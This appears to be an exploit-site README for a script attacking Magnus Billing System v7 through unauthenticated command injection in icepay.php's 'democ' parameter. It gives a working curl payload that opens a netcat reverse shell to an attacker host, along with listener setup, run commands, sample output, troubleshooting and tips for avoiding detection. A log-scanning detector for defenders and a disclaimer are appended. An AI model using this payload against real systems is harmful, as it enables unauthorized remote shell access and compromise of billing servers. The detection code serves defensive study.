## https://sploitus.com/exploit?id=82344D7F-45DE-547C-BC1F-87996F370E36
# Magnus Billing System v7 Exploit

This Python script automates the exploitation of a command injection vulnerability in Magnus Billing System v7, specifically in the `icepay.php` script located at `/mbilling/lib/icepay/icepay.php`. The exploit leverages the `democ` parameter to execute arbitrary commands on the target system, ultimately establishing a reverse shell to an attacker-controlled machine.

## Vulnerability Overview

The vulnerability allows unauthenticated command injection via a crafted GET request. The original proof-of-concept (PoC) used the following `curl` command:

```bash
curl -s 'http://<TARGET_IP>/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER_IP> <PORT> >/tmp/f;'
```

This script automates that process, making it configurable via command-line arguments.

## Features

- **Configurable**: Specify the target IP, attacker IP, and port via command-line arguments
- **Simple**: Uses the `requests` library to send the HTTP request with the payload
- **Feedback**: Provides clear output to track the exploit's progress

## Prerequisites

- **Python 3.x**: Ensure Python 3 is installed on your system
- **Requests Library**: Install the `requests` Python module:
  ```bash
  pip install requests
  ```
- **Netcat**: The target system must have `netcat` (`nc`) installed for the reverse shell to work
- **Listener**: Set up a `netcat` listener on the attacker machine to catch the reverse shell
- **Vulnerable Target**: The target must be running Magnus Billing System v7 with the vulnerable `icepay.php` script accessible

## Usage

### Setup

1. **Clone or Download**: Save the script as `exploit.py`
2. **Set Up Listener**: On your attacker machine, start a `netcat` listener:
   ```bash
   nc -lvnp <PORT>
   ```
   Replace `<PORT>` with your chosen port (e.g., `443`)

### Running the Exploit

```bash
python exploit.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>
```

**Parameters:**
- `-t, --target`: IP address of the target Magnus Billing System
- `-a, --attacker`: Your IP address to receive the reverse shell
- `-p, --port`: Port on your machine for the reverse shell

### Example

```bash
python exploit.py -t 10.10.160.86 -a 10.8.64.79 -p 443
```

**Expected Output:**
```
=== Magnus Billing System v7 Exploit ===
Command Injection via icepay.php - Reverse Shell
=======================================
[+] Targeting: http://10.10.160.86/mbilling/lib/icepay/icepay.php
[+] Attacker: 10.8.64.79:443
[+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.64.79 443 >/tmp/f;
[+] Request sent successfully!
[*] Check your netcat listener (e.g., 'nc -lvnp 443') for a shell.
```

**Catch the Shell**: Switch to your `netcat` listener to interact with the reverse shell if successful

## Technical Notes

- **Payload Type**: The script uses a FIFO-based reverse shell (`mkfifo`) with `netcat`
- **Error Handling**: Basic checks for network errors and invalid ports are included
- **Debugging**: To inspect the server's response, uncomment `print(response.text)` in the `exploit()` function
- **Alternative Payloads**: The script can be modified to use different reverse shell payloads if needed

## Troubleshooting

- If the connection fails, verify that:
  - The target system has `netcat` installed
  - No firewall is blocking the connection
  - The correct ports are being used
  - The target has not been patched

## Security Considerations

- Consider using SSH tunneling or a VPN when using this exploit to avoid detection
- The payload might trigger security monitoring systems
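
For defenders, one way to surface attempts against this endpoint in web server access logs, flagging requests to `icepay.php` whose decoded `democ` value contains shell metacharacters. This is an added example, not part of the original exploit script; the Combined Log Format, the name `suspicious_requests`, and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path and parameter named on this page.
VULN_PATH = "/mbilling/lib/icepay/icepay.php"
PARAM = "democ"
# Shell metacharacters that should not appear in this parameter's value.
SHELL_META = re.compile(r"[;|&`$<>\n]")
# Combined Log Format prefix (assumed): client, ident, user, [time], "METHOD target PROTO", status
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def suspicious_requests(lines):
    """Return (client, time, status, decoded democ value) for each matching line."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, when, _method, target, status = m.groups()
        url = urlsplit(target)
        # Decode, collapse duplicate slashes and lowercase before comparing the path.
        path = re.sub(r"/+", "/", unquote(url.path)).lower()
        if path != VULN_PATH:
            continue
        # parse_qs percent-decodes, so '%3B' and ';' are treated alike.
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if SHELL_META.search(value):
                hits.append((client, when, int(status), value))
    return hits

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /mbilling/ HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2025:10:00:05 +0000] "GET /mbilling/lib/icepay/icepay.php?democ=%3Bid%3B HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2025:10:01:00 +0000] "GET /mbilling/lib/icepay/icepay.php?democ=1 HTTP/1.1" 200 0',
    '203.0.113.4 - - [01/Jan/2025:10:02:00 +0000] "GET /mbilling//lib/icepay/icepay.php?x=1&democ=a%7Cb HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Any hit is worth triage regardless of the response status, since the page describes the injection as unauthenticated.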

## Disclaimer

This tool is provided for **educational and security testing purposes only**. Use it only on systems you have explicit permission to test. Unauthorized use against systems you do not own or have consent to test is illegal and unethical. The author is not responsible for any misuse or damage caused by this script.

## License

This project is released under the MIT License. Feel free to modify and distribute it as needed, keeping the disclaimer intact.

## Contributing

Contributions, bug reports, and feature requests are welcome. Please feel free to submit a pull request or open an issue.